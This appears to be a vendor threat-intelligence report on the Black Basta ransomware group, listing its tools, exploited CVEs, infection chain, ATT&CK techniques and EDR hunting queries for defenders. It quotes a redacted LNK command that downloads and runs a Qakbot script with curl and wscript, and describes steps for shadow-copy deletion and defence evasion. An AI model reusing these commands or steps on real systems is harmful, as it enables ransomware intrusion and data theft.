- Short Summary: Black Basta is a ransomware group that operates as ransomware-as-a-service (RaaS), first identified in April 2022. They employ double extortion tactics, demanding payment for both decryption and non-release of stolen data. The group has impacted over 500 organizations globally, utilizing common initial access methods such as phishing and exploitation of vulnerabilities.
- Key Points:
  - Black Basta uses double extortion techniques.
  - First spotted in April 2022, linked to over 500 organizations worldwide.
  - Common initial access methods include phishing, Qakbot, and Cobalt Strike.
  - Known to exploit various vulnerabilities for access and lateral movement.
  - Tools used include Qakbot, Cobalt Strike, Mimikatz, and others.
  - Ransomware encrypts files using the ChaCha20 algorithm and an RSA-4096 key.
  - Employs various tactics for evading detection and maintaining persistence.
Overview
Black Basta is a ransomware group operating as ransomware-as-a-service (RaaS), first spotted in April 2022. It is known to use double extortion techniques where the group demands payment for the decryption and non-release of stolen data. Earlier versions of Black Basta share many similarities with Conti Ransomware.
A wide range of industries and critical infrastructure in North America, Europe, and Australia have been impacted by Black Basta. To date, 500+ organizations have been affected globally by Black Basta affiliates gaining initial access through common methods like phishing, Qakbot, Cobalt Strike, and exploitation of known vulnerabilities. Once inside, the bad actors move laterally within the network to identify critical systems and data before deploying ransomware. Black Basta has been associated with the FIN7 threat actor due to similarities in custom modules for evading Endpoint Detection and Response (EDR) systems.
The known tools abused by the Black Basta group include malware, adversary emulation frameworks, and legitimate tools:
BITSAdmin, Mimikatz, RClone, Splashtop, WMI, Cobalt Strike, SoftPerfect, WinSCP, Qakbot, PowerShell, ScreenConnect, PSExec, EvilProxy, SystemBC, Backstab, Netcat, Quick Assist, NetSupport Manager
Black Basta is also known to exploit various vulnerabilities for initial access, privilege escalation, and lateral movement. Here is the list of vulnerabilities exploited by Black Basta:
Name | CVE ID | CWE ID |
ConnectWise | CVE-2024-1709 | CWE-288 |
Windows Error Reporting Service | CVE-2024-26169 | CWE-269 |
ZeroLogon | CVE-2020-1472 | CWE-330 |
NoPac | CVE-2021-42278 | CWE-20 |
NoPac | CVE-2021-42287 | CWE-269 |
PrintNightmare | CVE-2021-34527 | CWE-269 |
Technical Analysis
The Black Basta infection chain usually starts with a spear phishing email campaign that delivers a malicious link or attachment to the victim. Other initial infection vectors, such as exploitation of vulnerabilities and Remote Desktop Protocol (RDP), have also been used by this threat actor.
Downloaded zip archives contain a malicious .lnk (shortcut) or an Excel file that downloads and executes the Qakbot malware.
/q /c MD "%APPDATA%xxxxxx" && curl.exe --output %APPDATA%xxxxxxqakbot.js hxxps://xxxxx[.]com/xxx.js && cd "%APPDATA%xxxxxx" && wscript qakbot.js
As shown in the command embedded in the LNK file, curl and WScript are used to download and execute the Qakbot JavaScript file.
Upon execution, Qakbot establishes persistence using autorun entries and scheduled tasks, and, for defense evasion, runs various PowerShell scripts to disable and remove Windows Defender Antivirus protection.
Qakbot also establishes C2 communication with the threat actor to deliver other malware such as SystemBC and Cobalt Strike, and legitimate tools such as BITSAdmin, Splashtop, and ScreenConnect. Based on the TTPs employed by Black Basta affiliates, these tools and malware support different phases of the attack, such as Discovery, Privilege Escalation, Credential Access, and Lateral Movement.
Admin credentials are obtained via tools like Mimikatz, which is used for credential dumping and pass-the-hash attacks. CobaltStrike Beacons enable the threat actor to move laterally and deploy ransomware across the network.
Once installed and established on the victim’s network, Black Basta first identifies and collects sensitive files for exfiltration. Rclone and WinSCP are used to exfiltrate the data; Rclone uploads it to a configured cloud storage provider, most often Mega.
The next stage of the double extortion technique, after the exfiltration of data, is to encrypt endpoints with Black Basta ransomware. The ransomware binary uses vssadmin.exe to delete the shadow copy files to prevent system recovery.
As depicted in the screenshot below, bcdedit.exe is leveraged to reboot the system in safe mode to disable endpoint defenses and start the operating system with a limited set of drivers and services.
Once the system is rebooted in safe mode, Black Basta uses the ChaCha20 algorithm to encrypt files. The ChaCha20 encryption key is then encrypted with a public RSA-4096 key that is included in the executable.
It also drops *.jpg and *.ico files in the %temp% directory and modifies the registry to change the desktop background and file icon after encryption. The following registry keys are created or modified:
The ransomware then generates multiple instances of a file, either named “readme.txt” or “instructions_read_me.txt” depending on the variant, which includes the following ransom note:
Hunting Queries
Qualys Endpoint Detection and Response (EDR) customers can use the following hunting queries to detect suspicious activity associated with Black Basta ransomware. For any hits, investigate the file modifications, network connections, child/parent processes, and cross-process injections. Qualys also recommends tuning the hunting queries for false positives according to the customer environment.
Procedure | TID | Query |
Using vssadmin to delete Shadow copy files | T1490 | (parent.name:cmd.exe and process.name:vssadmin.exe and process.arguments:"delete shadows") |
Reboot victim’s machine in safe mode using bcdedit | T1562.009 | (parent.name:cmd.exe and process.name:bcdedit.exe and process.arguments:"safeboot network") |
Qakbot JS file dropped using curl into %AppData% directory | T1105 | (parent.name:curl.exe and (file.fullpath:AppData or file.extension:js)) |
Disable Windows Defender protection using PowerShell | T1562.001 | (process.name:powershell.exe and (process.arguments:DisableAntiSpyware or process.arguments:DisableRealtimeMonitoring)) |
Hunting for Ransom Note | T1486 | (file.extension:txt and (file.name:"readme.txt" or file.name:"instructions_read_me.txt")) |
MITRE ATT&CK Techniques
Tactic | Technique | ID |
Initial Access | Phishing | T1566 |
Initial Access | Exploit Public-Facing Application | T1190 |
Discovery | File and Directory Discovery | T1083 |
Execution | User Execution: Malicious File | T1204.002 |
Execution | Command and Scripting Interpreter: Windows Command Shell | T1059.003 |
Execution | Windows Management Instrumentation | T1047 |
Execution | Command and Scripting Interpreter: PowerShell | T1059.001 |
Persistence | Create or Modify System Process: Windows Service | T1543.003 |
Privilege Escalation | Exploitation for Privilege Escalation | T1068 |
Defense Evasion | Virtualization/Sandbox Evasion | T1497 |
Defense Evasion | Impair Defenses: Safe Mode Boot | T1562.009 |
Defense Evasion | Masquerading | T1036 |
Defense Evasion | Modify Registry | T1112 |
Defense Evasion | Impair Defenses: Disable or Modify Tools | T1562.001 |
Impact | Inhibit System Recovery | T1490 |
Impact | Data Encrypted for Impact | T1486 |
Indicators of Compromise